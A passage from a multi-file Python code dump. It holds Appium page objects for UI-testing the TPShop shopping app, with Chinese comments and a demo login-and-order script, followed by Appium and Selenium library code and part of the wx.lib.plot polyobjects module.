points_fee_loc = ('id','com.tpshop.malls:id/has_point_tv') # 使用的积分
def click_address_RS(self):
"""点击选择收货地址"""
self.click(self.select_address_RS_loc)
def choose_consignee_RS(self):
"""选择收货人"""
self.click(self.consignee_RS_loc)
def click_order_balance_RS(self):
"""点击使用余额"""
self.click(self.use_order_balance_loc)
def click_sub_order_RS(self):
"""点击提交订单"""
self.click(self.sub_order_RS_loc)
def input_pay_pwd_RS(self, text):
"""输入支付密码"""
self.send_keys(self.pay_pwd_RS_loc, text)
def click_confirm_pay_pwd_RS(self):
"""确认支付密码"""
self.click(self.confirm_pay_pwd_RS_loc)
def get_order_balance(self):
"""获取订单显示的当前余额"""
return self.get_ele_text(self.order_balance_loc)
def get_balance_fee(self):
"""获取支付的余额"""
return self.get_ele_text(self.balance_fee_loc)
def get_points_fee(self):
"""获取使用的积分"""
return self.get_ele_text(self.points_fee_loc)
if __name__ == '__main__':
from common.base_app import open_app
from time import sleep
driver = open_app() # 打开TPShop,进入登录页面
confirm = ConfirmOrderPage(driver)
confirm.input_account_num('13730626896') # 输入账号
confirm.input_password('<PASSWORD>') # 输入密码
confirm.click_confirm_login() # 点击登录
confirm.wait_page() # 等待页面加载
confirm.click_search() # 点击搜索框
confirm.input_search_content('容声冰箱') # 搜索容声冰箱
confirm.click_search_button() # 点击搜索按钮
confirm.wait_page() # 等待页面加载
sleep(2)
confirm.click_RSfridge() # 点击容声冰箱
confirm.wait_page() # 等待页面加载
sleep(3)
confirm.click_buy_RS() # 点击立即购买
confirm.click_confrim_buy_RS() # 点击确认购买
confirm.click_address_RS() # 点击选择收货地址
confirm.choose_consignee_RS() # 选择收货人
confirm.click_order_balance_RS() # 点击使用余额
confirm.wait_page() # 等待页面加载
confirm.click_sub_order_RS() # 点击提交订单
confirm.input_pay_pwd_RS('<PASSWORD>') # 输入支付密码
confirm.click_confirm_pay_pwd_RS() # 确认支付密码
sleep(3)
confirm.quit()
```
#### File: APP_aaaaaaaa/page/G_personal_center_page.py
```python
from page.F_my_order import MyOrderPage
class PersonalCenterPage(MyOrderPage):
"""个人中心页面"""
to_appraisal_loc = ('xpath', '//*[@text="待评价"]')
mine_balance_loc = ('id', 'com.tpshop.malls:id/balance_tv') # 我的--余额
mine_points_loc = ('id', 'com.tpshop.malls:id/point_tv') # 我的--积分
def click_to_appraisal(self):
"""点击待评价"""
self.click(self.to_appraisal_loc)
def get_mine_balance(self):
"""获取我的--余额"""
return self.get_ele_text(self.mine_balance_loc)
def get_mine_ponits(self):
"""获取我的--积分"""
return self.get_ele_text(self.mine_points_loc)
```
#### File: APP_aaaaaaaa/page/H_appraisal_center_page.py
```python
from page.G_personal_center_page import PersonalCenterPage
class AppraisalCenterPage(PersonalCenterPage):
"""评价中心页面"""
appraisal_show_loc = ('id', 'com.tpshop.malls:id/order_show_btn') # 评价晒单链接
def click_appraisal_show_link(self):
"""点击评价晒单"""
self.click(self.appraisal_show_loc)
```
#### File: extensions/android/common.py
```python
from selenium import webdriver
from appium.webdriver.mobilecommand import MobileCommand as Command
class Common(webdriver.Remote):
def end_test_coverage(self, intent, path):
"""Ends the coverage collection and pull the coverage.ec file from the device.
Android only.
See https://github.com/appium/appium/blob/master/docs/en/writing-running-appium/android/android-coverage.md
Args:
intent (str): description of operation to be performed
path (str): path to coverage.ec file to be pulled from the device
Returns:
TODO
"""
data = {
'intent': intent,
'path': path,
}
return self.execute(Command.END_TEST_COVERAGE, data)['value']
def open_notifications(self):
"""Open notification shade in Android (API Level 18 and above)
Returns:
`appium.webdriver.webdriver.WebDriver`
"""
self.execute(Command.OPEN_NOTIFICATIONS, {})
return self
@property
def current_package(self):
"""Retrieves the current package running on the device.
"""
return self.execute(Command.GET_CURRENT_PACKAGE)['value']
def _addCommands(self):
self.command_executor._commands[Command.GET_CURRENT_PACKAGE] = \
('GET', '/session/$sessionId/appium/device/current_package')
self.command_executor._commands[Command.END_TEST_COVERAGE] = \
('POST', '/session/$sessionId/appium/app/end_test_coverage')
self.command_executor._commands[Command.OPEN_NOTIFICATIONS] = \
('POST', '/session/$sessionId/appium/device/open_notifications')
```
#### File: site-packages/Selenium2Library/__init__.py
```python
import inspect
from SeleniumLibrary import SeleniumLibrary
__version__ = '3.0.0'
class Selenium2Library(SeleniumLibrary):
ROBOT_LIBRARY_VERSION = __version__
def get_keyword_documentation(self, name):
if name != '__intro__':
doc = SeleniumLibrary.get_keyword_documentation(self, name)
return doc.replace('SeleniumLibrary', 'Selenium2Library')
intro = inspect.getdoc(SeleniumLibrary)
intro = intro.replace('SeleniumLibrary', 'Selenium2Library')
return """
---
*NOTE:* Selenium2Library has been renamed to SeleniumLibrary since version 3.0.
Nowadays Selenium2Library is just a thin wrapper to SeleniumLibrary that eases
with transitioning to the new project. See
[https://github.com/robotframework/SeleniumLibrary|SeleniumLibrary] and
[https://github.com/robotframework/Selenium2Library|Selenium2Library]
project pages for more information.
---
""" + intro
```
#### File: SeleniumLibrary/keywords/alert.py
```python
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from SeleniumLibrary.base import keyword, LibraryComponent
from SeleniumLibrary.utils import is_truthy, secs_to_timestr
class AlertKeywords(LibraryComponent):
ACCEPT = 'ACCEPT'
DISMISS = 'DISMISS'
LEAVE = 'LEAVE'
_next_alert_action = ACCEPT
@keyword
def input_text_into_alert(self, text, action=ACCEPT, timeout=None):
"""Types the given ``text`` into an input field in an alert.
The alert is accepted by default, but that behavior can be controlled
by using the ``action`` argument same way as with `Handle Alert`.
``timeout`` specifies how long to wait for the alert to appear.
If it is not given, the global default `timeout` is used instead.
New in SeleniumLibrary 3.0.
"""
alert = self._wait_alert(timeout)
alert.send_keys(text)
self._handle_alert(alert, action)
@keyword
def alert_should_be_present(self, text='', action=ACCEPT, timeout=None):
"""Verifies that an alert is present and by default, accepts it.
Fails if no alert is present. If ``text`` is a non-empty string,
then it is used to verify alert's message. The alert is accepted
by default, but that behavior can be controlled by using the
``action`` argument same way as with `Handle Alert`.
``timeout`` specifies how long to wait for the alert to appear.
If it is not given, the global default `timeout` is used instead.
``action`` and ``timeout`` arguments are new in SeleniumLibrary 3.0.
In earlier versions, the alert was always accepted and a timeout was
hardcoded to one second.
"""
message = self.handle_alert(action, timeout)
if text and text != message:
raise AssertionError("Alert message should have been '%s' but it "
"was '%s'." % (text, message))
@keyword
def alert_should_not_be_present(self, action=ACCEPT, timeout=0):
"""Verifies that no alert is present.
If the alert actually exists, the ``action`` argument determines
how it should be handled. By default, the alert is accepted, but
it can be also dismissed or left open the same way as with the
`Handle Alert` keyword.
``timeout`` specifies how long to wait for the alert to appear.
By default, is not waited for the alert at all, but a custom time can
be given if alert may be delayed. See the `time format` section
for information about the syntax.
New in SeleniumLibrary 3.0.
"""
try:
alert = self._wait_alert(timeout)
except AssertionError:
return
text = self._handle_alert(alert, action)
raise AssertionError("Alert with message '%s' present." % text)
@keyword
def handle_alert(self, action=ACCEPT, timeout=None):
"""Handles the current alert and returns its message.
By default, the alert is accepted, but this can be controlled
with the ``action`` argument that supports the following
case-insensitive values:
- ``ACCEPT``: Accept the alert i.e. press ``Ok``. Default.
- ``DISMISS``: Dismiss the alert i.e. press ``Cancel``.
- ``LEAVE``: Leave the alert open.
The ``timeout`` argument specifies how long to wait for the alert
to appear. If it is not given, the global default `timeout` is used
instead.
Examples:
| Handle Alert | | | # Accept alert. |
| Handle Alert | action=DISMISS | | # Dismiss alert. |
| Handle Alert | timeout=10 s | | # Use custom timeout and accept alert. |
| Handle Alert | DISMISS | 1 min | # Use custom timeout and dismiss alert. |
| ${message} = | Handle Alert | | # Accept alert and get its message. |
| ${message} = | Handle Alert | LEAVE | # Leave alert open and get its message. |
New in SeleniumLibrary 3.0.
"""
alert = self._wait_alert(timeout)
return self._handle_alert(alert, action)
def _handle_alert(self, alert, action):
action = action.upper()
text = ' '.join(alert.text.splitlines())
if action == self.ACCEPT:
alert.accept()
elif action == self.DISMISS:
alert.dismiss()
elif action != self.LEAVE:
raise ValueError("Invalid alert action '%s'." % action)
return text
def _wait_alert(self, timeout=None):
timeout = self.get_timeout(timeout)
wait = WebDriverWait(self.driver, timeout)
try:
return wait.until(EC.alert_is_present())
except WebDriverException:
raise AssertionError('Alert not found in %s.'
% secs_to_timestr(timeout))
```
#### File: lib/plot/polyobjects.py
```python
__docformat__ = "restructuredtext en"
# Standard Library
import time as _time
import wx
import warnings
from collections import namedtuple
# Third-Party
try:
import numpy as np
except:
msg = """
This module requires the NumPy module, which could not be
imported. It probably is not installed (it's not part of the
standard Python distribution). See the Numeric Python site
(http://numpy.scipy.org) for information on downloading source or
binaries."""
raise ImportError("NumPy not found.\n" + msg)
# Package
from .utils import pendingDeprecation
from .utils import TempStyle
from .utils import pairwise
class PolyPoints(object):
"""
Base Class for lines and markers.
:param points: The points to plot
:type points: list of ``(x, y)`` pairs
:param attr: Additional attributes
:type attr: dict
.. warning::
All methods are private.
"""
def __init__(self, points, attr):
self._points = np.array(points).astype(np.float64)
self._logscale = (False, False)
self._absScale = (False, False)
self._symlogscale = (False, False)
self._pointSize = (1.0, 1.0)
self.currentScale = (1, 1)
self.currentShift = (0, 0)
self.scaled = self.points
self.attributes = {}
self.attributes.update(self._attributes)
for name, value in attr.items():
if name not in self._attributes.keys():
err_txt = "Style attribute incorrect. Should be one of {}"
raise KeyError(err_txt.format(self._attributes.keys()))
self.attributes[name] = value
@property
def logScale(self):
"""
A tuple of ``(x_axis_is_log10, y_axis_is_log10)`` booleans. If a value
is ``True``, then that axis is plotted on a logarithmic base 10 scale.
:getter: Returns the current value of logScale
:setter: Sets the value of logScale
:type: tuple of bool, length 2
:raises ValueError: when setting an invalid value
"""
return self._logscale
@logScale.setter
def logScale(self, logscale):
if not isinstance(logscale, tuple) or len(logscale) != 2:
raise ValueError("`logscale` must be a 2-tuple of bools")
self._logscale = logscale
def setLogScale(self, logscale):
"""
Set to change the axes to plot Log10(values)
Value must be a tuple of booleans (x_axis_bool, y_axis_bool)
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PolyPoints.logScale`
property instead.
"""
pendingDeprecation("self.logScale property")
self._logscale = logscale
@property
def symLogScale(self):
"""
.. warning::
Not yet implemented.
A tuple of ``(x_axis_is_SymLog10, y_axis_is_SymLog10)`` booleans.
If a value is ``True``, then that axis is plotted on a symmetric
logarithmic base 10 scale.
A Symmetric Log10 scale means that values can be positive and
negative. Any values less than
:attr:`~wx.lig.plot.PolyPoints.symLogThresh` will be plotted on
a linear scale to avoid the plot going to infinity near 0.
:getter: Returns the current value of symLogScale
:setter: Sets the value of symLogScale
:type: tuple of bool, length 2
:raises ValueError: when setting an invalid value
.. notes::
This is a simplified example of how SymLog works::
if x >= thresh:
x = Log10(x)
elif x =< thresh:
x = -Log10(Abs(x))
else:
x = x
.. seealso::
+ :attr:`~wx.lib.plot.PolyPoints.symLogThresh`
+ See http://matplotlib.org/examples/pylab_examples/symlog_demo.html
for an example.
"""
return self._symlogscale
# TODO: Implement symmetric log scale
@symLogScale.setter
def symLogScale(self, symlogscale, thresh):
raise NotImplementedError("Symmetric Log Scale not yet implemented")
if not isinstance(symlogscale, tuple) or len(symlogscale) != 2:
raise ValueError("`symlogscale` must be a 2-tuple of bools")
self._symlogscale = symlogscale
@property
def symLogThresh(self):
"""
.. warning::
Not yet implemented.
A tuple of ``(x_thresh, y_thresh)`` floats that define where the plot
changes to linear scale when using a symmetric log scale.
:getter: Returns the current value of symLogThresh
:setter: Sets the value of symLogThresh
:type: tuple of float, length 2
:raises ValueError: when setting an invalid value
.. notes::
This is a simplified example of how SymLog works::
if x >= thresh:
x = Log10(x)
elif x =< thresh:
x = -Log10(Abs(x))
else:
x = x
.. seealso::
+ :attr:`~wx.lib.plot.PolyPoints.symLogScale`
+ See http://matplotlib.org/examples/pylab_examples/symlog_demo.html
for an example.
"""
return self._symlogscale
# TODO: Implement symmetric log scale threshold
@symLogThresh.setter
def symLogThresh(self, symlogscale, thresh):
raise NotImplementedError("Symmetric Log Scale not yet implemented")
if not isinstance(symlogscale, tuple) or len(symlogscale) != 2:
raise ValueError("`symlogscale` must be a 2-tuple of bools")
self._symlogscale = symlogscale
@property
def absScale(self):
"""
A tuple of ``(x_axis_is_abs, y_axis_is_abs)`` booleans. If a value
is ``True``, then that axis is plotted on an absolute value scale.
:getter: Returns the current value of absScale
:setter: Sets the value of absScale
:type: tuple of bool, length 2
:raises ValueError: when setting an invalid value
"""
return self._absScale
@absScale.setter
def absScale(self, absscale):
if not isinstance(absscale, tuple) and len(absscale) == 2:
raise ValueError("`absscale` must be a 2-tuple of bools")
self._absScale = absscale
@property
def points(self):
"""
Get or set the plotted points.
:getter: Returns the current value of points, adjusting for the
various scale options such as Log, Abs, or SymLog.
:setter: Sets the value of points.
:type: list of `(x, y)` pairs
.. Note::
Only set unscaled points - do not perform the log, abs, or symlog
adjustments yourself.
"""
data = np.array(self._points, copy=True) # need the copy
# TODO: get rid of the
# need for copy
# work on X:
if self.absScale[0]:
data = self._abs(data, 0)
if self.logScale[0]:
data = self._log10(data, 0)
if self.symLogScale[0]:
# TODO: implement symLogScale
# Should symLogScale override absScale? My vote is no.
# Should symLogScale override logScale? My vote is yes.
# - symLogScale could be a parameter passed to logScale...
pass
# work on Y:
if self.absScale[1]:
data = self._abs(data, 1)
if self.logScale[1]:
data = self._log10(data, 1)
if self.symLogScale[1]:
# TODO: implement symLogScale
pass
return data
@points.setter
def points(self, points):
self._points = points
def _log10(self, data, index):
""" Take the Log10 of the data, dropping any negative values """
data = np.compress(data[:, index] > 0, data, 0)
data[:, index] = np.log10(data[:, index])
return data
def _abs(self, data, index):
""" Take the Abs of the data """
data[:, index] = np.abs(data[:, index])
return data
def boundingBox(self):
"""
Returns the bouding box for the entire dataset as a tuple with this
format::
((minX, minY), (maxX, maxY))
:returns: boundingbox
:rtype: numpy array of ``[[minX, minY], [maxX, maxY]]``
"""
if len(self.points) == 0:
# no curves to draw
# defaults to (-1,-1) and (1,1) but axis can be set in Draw
minXY = np.array([-1.0, -1.0])
maxXY = np.array([1.0, 1.0])
else:
minXY = np.minimum.reduce(self.points)
maxXY = np.maximum.reduce(self.points)
return minXY, maxXY
def scaleAndShift(self, scale=(1, 1), shift=(0, 0)):
"""
Scales and shifts the data for plotting.
:param scale: The values to scale the data by.
:type scale: list of floats: ``[x_scale, y_scale]``
:param shift: The value to shift the data by. This should be in scaled
units
:type shift: list of floats: ``[x_shift, y_shift]``
:returns: None
"""
if len(self.points) == 0:
# no curves to draw
return
# TODO: Can we remove the if statement alltogether? Does
# scaleAndShift ever get called when the current value equals
# the new value?
# cast everything to list: some might be np.ndarray objects
if (list(scale) != list(self.currentScale)
or list(shift) != list(self.currentShift)):
# update point scaling
self.scaled = scale * self.points + shift
self.currentScale = scale
self.currentShift = shift
# else unchanged use the current scaling
def getLegend(self):
return self.attributes['legend']
def getClosestPoint(self, pntXY, pointScaled=True):
"""
Returns the index of closest point on the curve, pointXY,
scaledXY, distance x, y in user coords.
if pointScaled == True, then based on screen coords
if pointScaled == False, then based on user coords
"""
if pointScaled:
# Using screen coords
p = self.scaled
pxy = self.currentScale * np.array(pntXY) + self.currentShift
else:
# Using user coords
p = self.points
pxy = np.array(pntXY)
# determine distance for each point
d = np.sqrt(np.add.reduce((p - pxy) ** 2, 1)) # sqrt(dx^2+dy^2)
pntIndex = np.argmin(d)
dist = d[pntIndex]
return [pntIndex,
self.points[pntIndex],
self.scaled[pntIndex] / self._pointSize,
dist]
class PolyLine(PolyPoints):
"""
Creates PolyLine object
:param points: The points that make up the line
:type points: list of ``[x, y]`` values
:param **attr: keyword attributes
=========================== ============= ====================
Keyword and Default Description Type
=========================== ============= ====================
``colour='black'`` Line color :class:`wx.Colour`
``width=1`` Line width float
``style=wx.PENSTYLE_SOLID`` Line style :class:`wx.PenStyle`
``legend=''`` Legend string str
``drawstyle='line'`` see below str
=========================== ============= ====================
================== ==================================================
Draw style Description
================== ==================================================
``'line'`` Draws an straight line between consecutive points
``'steps-pre'`` Draws a line down from point A and then right to
point B
``'steps-post'`` Draws a line right from point A and then down
to point B
``'steps-mid-x'`` Draws a line horizontally to half way between A
and B, then draws a line vertically, then again
horizontally to point B.
``'steps-mid-y'`` Draws a line vertically to half way between A
and B, then draws a line horizonatally, then
again vertically to point B.
*Note: This typically does not look very good*
================== ==================================================
.. warning::
All methods except ``__init__`` are private.
"""
_attributes = {'colour': 'black',
'width': 1,
'style': wx.PENSTYLE_SOLID,
'legend': '',
'drawstyle': 'line',
}
_drawstyles = ("line", "steps-pre", "steps-post",
"steps-mid-x", "steps-mid-y")
def __init__(self, points, **attr):
PolyPoints.__init__(self, points, attr)
def draw(self, dc, printerScale, coord=None):
"""
Draw the lines.
:param dc: The DC to draw on.
:type dc: :class:`wx.DC`
:param printerScale:
:type printerScale: float
:param coord: The legend coordinate?
:type coord: ???
"""
colour = self.attributes['colour']
width = self.attributes['width'] * printerScale * self._pointSize[0]
style = self.attributes['style']
drawstyle = self.attributes['drawstyle']
if not isinstance(colour, wx.Colour):
colour = wx.Colour(colour)
pen = wx.Pen(colour, width, style)
pen.SetCap(wx.CAP_BUTT)
dc.SetPen(pen)
if coord is None:
if len(self.scaled): # bugfix for Mac OS X
for c1, c2 in zip(self.scaled, self.scaled[1:]):
self._path(dc, c1, c2, drawstyle)
else:
dc.DrawLines(coord) # draw legend line
def getSymExtent(self, printerScale):
"""
Get the Width and Height of the symbol.
:param printerScale:
:type printerScale: float
"""
h = self.attributes['width'] * printerScale * self._pointSize[0]
w = 5 * h
return (w, h)
def _path(self, dc, coord1, coord2, drawstyle):
"""
Calculates the path from coord1 to coord 2 along X and Y
:param dc: The DC to draw on.
:type dc: :class:`wx.DC`
:param coord1: The first coordinate in the coord pair
:type coord1: list, length 2: ``[x, y]``
:param coord2: The second coordinate in the coord pair
:type coord2: list, length 2: ``[x, y]``
:param drawstyle: The type of connector to use
:type drawstyle: str
"""
if drawstyle == 'line':
# Straight line between points.
line = [coord1, coord2]
elif drawstyle == 'steps-pre':
# Up/down to next Y, then right to next X
intermediate = [coord1[0], coord2[1]]
line = [coord1, intermediate, coord2]
elif drawstyle == 'steps-post':
# Right to next X, then up/down to Y
intermediate = [coord2[0], coord1[1]]
line = [coord1, intermediate, coord2]
elif drawstyle == 'steps-mid-x':
# need 3 lines between points: right -> up/down -> right
mid_x = ((coord2[0] - coord1[0]) / 2) + coord1[0]
intermediate1 = [mid_x, coord1[1]]
intermediate2 = [mid_x, coord2[1]]
line = [coord1, intermediate1, intermediate2, coord2]
elif drawstyle == 'steps-mid-y':
# need 3 lines between points: up/down -> right -> up/down
mid_y = ((coord2[1] - coord1[1]) / 2) + coord1[1]
intermediate1 = [coord1[0], mid_y]
intermediate2 = [coord2[0], mid_y]
line = [coord1, intermediate1, intermediate2, coord2]
else:
err_txt = "Invalid drawstyle '{}'. Must be one of {}."
raise ValueError(err_txt.format(drawstyle, self._drawstyles))
dc.DrawLines(line)
class PolySpline(PolyLine):
"""
Creates PolySpline object
:param points: The points that make up the spline
:type points: list of ``[x, y]`` values
:param **attr: keyword attributes
=========================== ============= ====================
Keyword and Default Description Type
=========================== ============= ====================
``colour='black'`` Line color :class:`wx.Colour`
``width=1`` Line width float
``style=wx.PENSTYLE_SOLID`` Line style :class:`wx.PenStyle`
``legend=''`` Legend string str
=========================== ============= ====================
.. warning::
All methods except ``__init__`` are private.
"""
_attributes = {'colour': 'black',
'width': 1,
'style': wx.PENSTYLE_SOLID,
'legend': ''}
def __init__(self, points, **attr):
PolyLine.__init__(self, points, **attr)
def draw(self, dc, printerScale, coord=None):
""" Draw the spline """
colour = self.attributes['colour']
width = self.attributes['width'] * printerScale * self._pointSize[0]
style = self.attributes['style']
if not isinstance(colour, wx.Colour):
colour = wx.Colour(colour)
pen = wx.Pen(colour, width, style)
pen.SetCap(wx.CAP_ROUND)
dc.SetPen(pen)
if coord is None:
if len(self.scaled) >= 3:
dc.DrawSpline(self.scaled)
else:
dc.DrawLines(coord) # draw legend line
class PolyMarker(PolyPoints):
"""
Creates a PolyMarker object.
:param points: The marker coordinates.
:type points: list of ``[x, y]`` values
:param **attr: keyword attributes
================================= ============= ====================
Keyword and Default Description Type
================================= ============= ====================
``marker='circle'`` see below str
``size=2`` Marker size float
``colour='black'`` Outline color :class:`wx.Colour`
``width=1`` Outline width float
``style=wx.PENSTYLE_SOLID`` Outline style :class:`wx.PenStyle`
``fillcolour=colour`` fill color :class:`wx.Colour`
``fillstyle=wx.BRUSHSTYLE_SOLID`` fill style :class:`wx.BrushStyle`
``legend=''`` Legend string str
================================= ============= ====================
=================== ==================================
Marker Description
=================== ==================================
``'circle'`` A circle of diameter ``size``
``'dot'`` A dot. Does not have a size.
``'square'`` A square with side length ``size``
``'triangle'`` An upward-pointed triangle
``'triangle_down'`` A downward-pointed triangle
``'cross'`` An "X" shape
``'plus'`` A "+" shape
=================== ==================================
.. warning::
All methods except ``__init__`` are private.
"""
_attributes = {'colour': 'black',
'width': 1,
'size': 2,
'fillcolour': None,
'fillstyle': wx.BRUSHSTYLE_SOLID,
'marker': 'circle',
'legend': ''}
def __init__(self, points, **attr):
PolyPoints.__init__(self, points, attr)
def draw(self, dc, printerScale, coord=None):
""" Draw the points """
colour = self.attributes['colour']
width = self.attributes['width'] * printerScale * self._pointSize[0]
size = self.attributes['size'] * printerScale * self._pointSize[0]
fillcolour = self.attributes['fillcolour']
fillstyle = self.attributes['fillstyle']
marker = self.attributes['marker']
if colour and not isinstance(colour, wx.Colour):
colour = wx.Colour(colour)
if fillcolour and not isinstance(fillcolour, wx.Colour):
fillcolour = wx.Colour(fillcolour)
dc.SetPen(wx.Pen(colour, width))
if fillcolour:
dc.SetBrush(wx.Brush(fillcolour, fillstyle))
else:
dc.SetBrush(wx.Brush(colour, fillstyle))
if coord is None:
if len(self.scaled): # bugfix for Mac OS X
self._drawmarkers(dc, self.scaled, marker, size)
else:
self._drawmarkers(dc, coord, marker, size) # draw legend marker
def getSymExtent(self, printerScale):
"""Width and Height of Marker"""
s = 5 * self.attributes['size'] * printerScale * self._pointSize[0]
return (s, s)
def _drawmarkers(self, dc, coords, marker, size=1):
f = getattr(self, "_{}".format(marker))
f(dc, coords, size)
def _circle(self, dc, coords, size=1):
fact = 2.5 * size
wh = 5.0 * size
rect = np.zeros((len(coords), 4), np.float) + [0.0, 0.0, wh, wh]
rect[:, 0:2] = coords - [fact, fact]
dc.DrawEllipseList(rect.astype(np.int32))
def _dot(self, dc, coords, size=1):
dc.DrawPointList(coords)
def _square(self, dc, coords, size=1):
fact = 2.5 * size
wh = 5.0 * size
rect = np.zeros((len(coords), 4), np.float) + [0.0, 0.0, wh, wh]
rect[:, 0:2] = coords - [fact, fact]
dc.DrawRectangleList(rect.astype(np.int32))
def _triangle(self, dc, coords, size=1):
shape = [(-2.5 * size, 1.44 * size),
(2.5 * size, 1.44 * size), (0.0, -2.88 * size)]
poly = np.repeat(coords, 3, 0)
poly.shape = (len(coords), 3, 2)
poly += shape
dc.DrawPolygonList(poly.astype(np.int32))
def _triangle_down(self, dc, coords, size=1):
shape = [(-2.5 * size, -1.44 * size),
(2.5 * size, -1.44 * size), (0.0, 2.88 * size)]
poly = np.repeat(coords, 3, 0)
poly.shape = (len(coords), 3, 2)
poly += shape
dc.DrawPolygonList(poly.astype(np.int32))
def _cross(self, dc, coords, size=1):
fact = 2.5 * size
for f in [[-fact, -fact, fact, fact], [-fact, fact, fact, -fact]]:
lines = np.concatenate((coords, coords), axis=1) + f
dc.DrawLineList(lines.astype(np.int32))
def _plus(self, dc, coords, size=1):
fact = 2.5 * size
for f in [[-fact, 0, fact, 0], [0, -fact, 0, fact]]:
lines = np.concatenate((coords, coords), axis=1) + f
dc.DrawLineList(lines.astype(np.int32))
class PolyBarsBase(PolyPoints):
"""
Base class for PolyBars and PolyHistogram.
.. warning::
All methods are private.
"""
_attributes = {'edgecolour': 'black',
'edgewidth': 2,
'edgestyle': wx.PENSTYLE_SOLID,
'legend': '',
'fillcolour': 'red',
'fillstyle': wx.BRUSHSTYLE_SOLID,
'barwidth': 1.0
}
def __init__(self, points, attr):
"""
"""
PolyPoints.__init__(self, points, attr)
def _scaleAndShift(self, data, scale=(1, 1), shift=(0, 0)):
"""same as override method, but retuns a value."""
scaled = scale * data + shift
return scaled
def getSymExtent(self, printerScale):
"""Width and Height of Marker"""
h = self.attributes['edgewidth'] * printerScale * self._pointSize[0]
w = 5 * h
return (w, h)
def set_pen_and_brush(self, dc, printerScale):
pencolour = self.attributes['edgecolour']
penwidth = (self.attributes['edgewidth']
* printerScale * self._pointSize[0])
penstyle = self.attributes['edgestyle']
fillcolour = self.attributes['fillcolour']
fillstyle = self.attributes['fillstyle']
if not isinstance(pencolour, wx.Colour):
pencolour = wx.Colour(pencolour)
pen = wx.Pen(pencolour, penwidth, penstyle)
pen.SetCap(wx.CAP_BUTT)
if not isinstance(fillcolour, wx.Colour):
fillcolour = wx.Colour(fillcolour)
brush = wx.Brush(fillcolour, fillstyle)
dc.SetPen(pen)
dc.SetBrush(brush)
def scale_rect(self, rect):
# Scale the points to the plot area
scaled_rect = self._scaleAndShift(rect,
self.currentScale,
self.currentShift)
# Convert to (left, top, width, height) for drawing
wx_rect = [scaled_rect[0][0], # X (left)
scaled_rect[0][1], # Y (top)
scaled_rect[1][0] - scaled_rect[0][0], # Width
scaled_rect[1][1] - scaled_rect[0][1]] # Height
return wx_rect
def draw(self, dc, printerScale, coord=None):
pass
class PolyBars(PolyBarsBase):
"""
Creates a PolyBars object.
:param points: The data to plot.
:type points: sequence of ``(center, height)`` points
:param **attr: keyword attributes
================================= ============= =======================
Keyword and Default Description Type
================================= ============= =======================
``barwidth=1.0`` bar width float or list of floats
``edgecolour='black'`` edge color :class:`wx.Colour`
``edgewidth=1`` edge width float
``edgestyle=wx.PENSTYLE_SOLID`` edge style :class:`wx.PenStyle`
``fillcolour='red'`` fill color :class:`wx.Colour`
``fillstyle=wx.BRUSHSTYLE_SOLID`` fill style :class:`wx.BrushStyle`
``legend=''`` legend string str
================================= ============= =======================
.. important::
If ``barwidth`` is a list of floats:
+ each bar will have a separate width
+ ``len(barwidth)`` must equal ``len(points)``.
.. warning::
All methods except ``__init__`` are private.
"""
def __init__(self, points, **attr):
PolyBarsBase.__init__(self, points, attr)
def calc_rect(self, x, y, w):
""" Calculate the rectangle for plotting. """
return self.scale_rect([[x - w / 2, y], # left, top
[x + w / 2, 0]]) # right, bottom
def draw(self, dc, printerScale, coord=None):
""" Draw the bars """
self.set_pen_and_brush(dc, printerScale)
barwidth = self.attributes['barwidth']
if coord is None:
if isinstance(barwidth, (int, float)):
# use a single width for all bars
pts = ((x, y, barwidth) for x, y in self.points)
elif isinstance(barwidth, (list, tuple)):
# use a separate width for each bar
if len(barwidth) != len(self.points):
err_str = ("Barwidth ({} items) and Points ({} items) do "
"not have the same length!")
err_str = err_str.format(len(barwidth), len(self.points))
raise ValueError(err_str)
pts = ((x, y, w) for (x, y), w in zip(self.points, barwidth))
else:
# invalid attribute type
err_str = ("Invalid type for 'barwidth'. Expected float, "
"int, or list or tuple of (int or float). Got {}.")
raise TypeError(err_str.format(type(barwidth)))
rects = [self.calc_rect(x, y, w) for x, y, w in pts]
dc.DrawRectangleList(rects)
else:
dc.DrawLines(coord) # draw legend line
class PolyHistogram(PolyBarsBase):
"""
Creates a PolyHistogram object.
:param hist: The histogram data.
:type hist: sequence of ``y`` values that define the heights of the bars
:param binspec: The bin specification.
:type binspec: sequence of ``x`` values that define the edges of the bins
:param **attr: keyword attributes
================================= ============= =======================
Keyword and Default Description Type
================================= ============= =======================
``edgecolour='black'`` edge color :class:`wx.Colour`
``edgewidth=3`` edge width float
``edgestyle=wx.PENSTYLE_SOLID`` edge style :class:`wx.PenStyle`
``fillcolour='blue'`` fill color :class:`wx.Colour`
``fillstyle=wx.BRUSHSTYLE_SOLID`` fill style :class:`wx.BrushStyle`
``legend=''`` legend string str
================================= ============= =======================
.. tip::
Use ``np.histogram()`` to easily create your histogram parameters::
hist_data, binspec = np.histogram(data)
hist_plot = PolyHistogram(hist_data, binspec)
.. important::
``len(binspec)`` must equal ``len(hist) + 1``.
.. warning::
All methods except ``__init__`` are private.
"""
def __init__(self, hist, binspec, **attr):
if len(binspec) != len(hist) + 1:
raise ValueError("Len(binspec) must equal len(hist) + 1")
self.hist = hist
self.binspec = binspec
# define the bins and center x locations
self.bins = list(pairwise(self.binspec))
bar_center_x = (pair[0] + (pair[1] - pair[0])/2 for pair in self.bins)
points = list(zip(bar_center_x, self.hist))
PolyBarsBase.__init__(self, points, attr)
def calc_rect(self, y, low, high):
""" Calculate the rectangle for plotting. """
return self.scale_rect([[low, y], # left, top
[high, 0]]) # right, bottom
def draw(self, dc, printerScale, coord=None):
""" Draw the bars """
self.set_pen_and_brush(dc, printerScale)
if coord is None:
rects = [self.calc_rect(y, low, high)
for y, (low, high)
in zip(self.hist, self.bins)]
dc.DrawRectangleList(rects)
else:
dc.DrawLines(coord) # draw legend line
class PolyBoxPlot(PolyPoints):
"""
Creates a PolyBoxPlot object.
:param data: Raw data to create a box plot from.
:type data: sequence of int or float
:param **attr: keyword attributes
================================= ============= =======================
Keyword and Default Description Type
================================= ============= =======================
``colour='black'`` edge color :class:`wx.Colour`
``width=1`` edge width float
``style=wx.PENSTYLE_SOLID`` edge style :class:`wx.PenStyle`
``legend=''`` legend string str
================================= ============= =======================
.. note::
``np.NaN`` and ``np.inf`` values are ignored.
.. admonition:: TODO
+ [ ] Figure out a better way to get multiple box plots side-by-side
(current method is a hack).
